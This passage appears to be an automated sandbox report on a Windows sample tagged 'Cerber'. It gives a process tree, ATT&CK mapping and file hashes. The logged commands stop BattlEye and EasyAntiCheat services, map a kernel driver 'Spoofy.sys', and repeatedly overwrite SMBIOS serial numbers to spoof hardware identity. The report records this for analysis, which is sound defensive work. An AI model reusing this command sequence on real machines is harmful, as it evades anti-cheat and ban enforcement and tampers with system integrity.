        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 2740)
      cmdline: C:\Windows\system32\cmd.exe /c sc stop BEService >nul 2>&1
    [3] C:\Windows\system32\sc.exe (PID 2408)
        cmdline: sc stop BEService
        - Launches sc.exe
  [2] C:\Windows\system32\cmd.exe (PID 2380)
      cmdline: C:\Windows\system32\cmd.exe /c sc stop BEDaisy >nul 2>&1
    [3] C:\Windows\system32\sc.exe (PID 4024)
        cmdline: sc stop BEDaisy
        - Launches sc.exe
  [2] C:\Windows\system32\cmd.exe (PID 2176)
      cmdline: C:\Windows\system32\cmd.exe /c sc stop EasyAntiCheat >nul 2>&1
    [3] C:\Windows\system32\sc.exe (PID 2752)
        cmdline: sc stop EasyAntiCheat
        - Launches sc.exe
  [2] C:\Windows\system32\cmd.exe (PID 3928)
      cmdline: C:\Windows\system32\cmd.exe /c sc stop EasyAntiCheatSys >nul 2>&1
    [3] C:\Windows\system32\sc.exe (PID 4844)
        cmdline: sc stop EasyAntiCheatSys
        - Launches sc.exe
  [2] C:\Windows\system32\cmd.exe (PID 4800)
      cmdline: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 5080)
      cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\System32\VXMapperV2.exe C:\Windows\System32\Spoofy.sys
    [3] C:\Windows\System32\VXMapperV2.exe (PID 3792)
        cmdline: C:\Windows\System32\VXMapperV2.exe C:\Windows\System32\Spoofy.sys
        - Sets service image path in registry
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: LoadsDriver
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 2068)
      cmdline: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 1836)
      cmdline: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 740)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /IVN "AMI"
    [3] C:\Windows\system32\cmd.exe (PID 5008)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /IVN "AMI"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 1116)
          cmdline: C:\Windows\System32\CupFixerx32.exe /IVN "AMI"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 5084)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /SP "MacBook Pro 13"
    [3] C:\Windows\system32\cmd.exe (PID 1324)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /SP "MacBook Pro 13"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 3180)
          cmdline: C:\Windows\System32\CupFixerx32.exe /SP "MacBook Pro 13"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 4264)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /SV "XPS 15 9570"
    [3] C:\Windows\system32\cmd.exe (PID 1572)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /SV "XPS 15 9570"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 2480)
          cmdline: C:\Windows\System32\CupFixerx32.exe /SV "XPS 15 9570"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 3104)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /SS "6BRCQFULLFZ7QKQP"
    [3] C:\Windows\system32\cmd.exe (PID 1564)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /SS "6BRCQFULLFZ7QKQP"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 2500)
          cmdline: C:\Windows\System32\CupFixerx32.exe /SS "6BRCQFULLFZ7QKQP"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 4904)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /SU "AUTO"
    [3] C:\Windows\system32\cmd.exe (PID 4348)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /SU "AUTO"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 4032)
          cmdline: C:\Windows\System32\CupFixerx32.exe /SU "AUTO"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 4492)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /SK "T6FTRVDXHN99XP9Z"
    [3] C:\Windows\system32\cmd.exe (PID 4560)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /SK "T6FTRVDXHN99XP9Z"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 8)
          cmdline: C:\Windows\System32\CupFixerx32.exe /SK "T6FTRVDXHN99XP9Z"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 868)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /BM "AsRock"
    [3] C:\Windows\system32\cmd.exe (PID 836)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /BM "AsRock"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 2980)
          cmdline: C:\Windows\System32\CupFixerx32.exe /BM "AsRock"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 4244)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /BP "P-8560M-C-2024"
    [3] C:\Windows\system32\cmd.exe (PID 2312)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /BP "P-8560M-C-2024"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 4284)
          cmdline: C:\Windows\System32\CupFixerx32.exe /BP "P-8560M-C-2024"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 3044)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /BS "UPUGL032FHVBP1TX"
    [3] C:\Windows\system32\cmd.exe (PID 2988)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /BS "UPUGL032FHVBP1TX"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 920)
          cmdline: C:\Windows\System32\CupFixerx32.exe /BS "UPUGL032FHVBP1TX"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 2396)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /BT "Default String"
    [3] C:\Windows\system32\cmd.exe (PID 4224)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /BT "Default String"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 2544)
          cmdline: C:\Windows\System32\CupFixerx32.exe /BT "Default String"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 3244)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /BLC "Default String"
    [3] C:\Windows\system32\cmd.exe (PID 420)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /BLC "Default String"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 1056)
          cmdline: C:\Windows\System32\CupFixerx32.exe /BLC "Default String"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 2604)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /CM "Default String"
    [3] C:\Windows\system32\cmd.exe (PID 2728)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /CM "Default String"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 4580)
          cmdline: C:\Windows\System32\CupFixerx32.exe /CM "Default String"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 3436)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /CV "Default String"
    [3] C:\Windows\system32\cmd.exe (PID 2316)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /CV "Default String"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 4496)
          cmdline: C:\Windows\System32\CupFixerx32.exe /CV "Default String"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 1228)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /CS "I6DMKVT7A3MFOBXT"
    [3] C:\Windows\system32\cmd.exe (PID 1072)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /CS "I6DMKVT7A3MFOBXT"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 4984)
          cmdline: C:\Windows\System32\CupFixerx32.exe /CS "I6DMKVT7A3MFOBXT"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 2576)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /CA "Default String"
    [3] C:\Windows\system32\cmd.exe (PID 1480)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /CA "Default String"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 4848)
          cmdline: C:\Windows\System32\CupFixerx32.exe /CA "Default String"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 4700)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /CSK "CGUCS-51079"
    [3] C:\Windows\system32\cmd.exe (PID 2188)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /CSK "CGUCS-51079"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 3188)
          cmdline: C:\Windows\System32\CupFixerx32.exe /CSK "CGUCS-51079"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 1560)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /PSN "AIA7N2Q3K6DQ4RSN"
    [3] C:\Windows\system32\cmd.exe (PID 4892)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /PSN "AIA7N2Q3K6DQ4RSN"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 2556)
          cmdline: C:\Windows\System32\CupFixerx32.exe /PSN "AIA7N2Q3K6DQ4RSN"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 3460)
      cmdline: C:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /PAT "DPPHK3ZPU8CJ6HXQ"
    [3] C:\Windows\system32\cmd.exe (PID 3368)
        cmdline: cmd /c C:\Windows\System32\CupFixerx32.exe /PAT "DPPHK3ZPU8CJ6HXQ"
      [4] C:\Windows\System32\CupFixerx32.exe (PID 3908)
          cmdline: C:\Windows\System32\CupFixerx32.exe /PAT "DPPHK3ZPU8CJ6HXQ"
          - Cerber
          - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe (PID 2896)
      cmdline: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 3428)
      cmdline: C:\Windows\system32\cmd.exe /c net stop winmgmt /y
    [3] C:\Windows\system32\net.exe (PID 3280)
        cmdline: net stop winmgmt /y
      [4] C:\Windows\system32\net1.exe (PID 3264)
          cmdline: C:\Windows\system32\net1 stop winmgmt /y
  [2] C:\Windows\system32\cmd.exe (PID 3724)
      cmdline: C:\Windows\system32\cmd.exe /c net start winmgmt /y
    [3] C:\Windows\system32\net.exe (PID 4008)
        cmdline: net start winmgmt /y
      [4] C:\Windows\system32\net1.exe (PID 2244)
          cmdline: C:\Windows\system32\net1 start winmgmt /y
  [2] C:\Windows\system32\cmd.exe (PID 4372)
      cmdline: C:\Windows\system32\cmd.exe /c sc stop winmgmt
    [3] C:\Windows\system32\sc.exe (PID 4356)
        cmdline: sc stop winmgmt
        - Launches sc.exe
  [2] C:\Windows\system32\cmd.exe (PID 4552)
      cmdline: C:\Windows\system32\cmd.exe /c sc start winmgmt
    [3] C:\Windows\system32\sc.exe (PID 3984)
        cmdline: sc start winmgmt
        - Launches sc.exe
  [2] C:\Windows\system32\cmd.exe (PID 1284)
      cmdline: C:\Windows\system32\cmd.exe /c ipconfig /flushdns
    [3] C:\Windows\system32\ipconfig.exe (PID 3844)
        cmdline: ipconfig /flushdns
        - Gathers network information
  [2] C:\Windows\system32\cmd.exe (PID 4024)
      cmdline: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 2380)
      cmdline: C:\Windows\system32\cmd.exe /c wmic diskdrive get serialnumber
    [3] C:\Windows\System32\Wbem\WMIC.exe (PID 840)
        cmdline: wmic diskdrive get serialnumber
        - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\svchost.exe (PID 2540)
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
[1] C:\Windows\system32\svchost.exe (PID 3020)
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
- System Services (1)
- Service Execution (1)
Persistence
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
- Windows Service (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
- Windows Service (1)
Downloads
Filesize: 451KB
MD5: feac8b5c2d2b99e7a3c8f1ba41ba3472
SHA1: 002bd5344c44f288c22e69b5e2846d515bfa429e
SHA256: 7fce635cb66dc1286856a1f1f281b90431288be4a9647a8e0cbd2a0346748b95
SHA512: b95b83545ca45453e6d64b7c2cf276932eded9658187aa91dcff948e59c313ae071b0059a481cd7b01aae778fc4fda71aa830fb99b84197fb17e03e9a10e8e68

Filesize: 394KB
MD5: 8464ecc3ff18a9adc217112c63f0bd95
SHA1: bf98f20460ab755a81269edd61ddfc39d6e58a68
SHA256: 7adb87b96253096e5d42754a77de2ec090f3a8f5e1aea34958d3118a5fa461ca
SHA512: 3fda9e0f9325b14ffa82e71962f7c9ed1b764dc570162c4acdf0bc42b73827102835820c66f30fd5bd64e5a4dea513ac0c6cdde8b2a87212f337944359b818c9

Filesize: 29KB
MD5: f22740ba54a400fd2be7690bb204aa08
SHA1: 5812387783d61c6ab5702213bb968590a18065e3
SHA256: 65c26276cadda7a36f8977d1d01120edb5c3418be2317d501761092d5f9916c9
SHA512: ac1f89736cf348f634b526569b5783118a1a35324f9ce2f2804001e5a04751f8cc21d09bfa1c4803cd14a64152beba868f5ecf119f10fa3ccbe680d2fb481500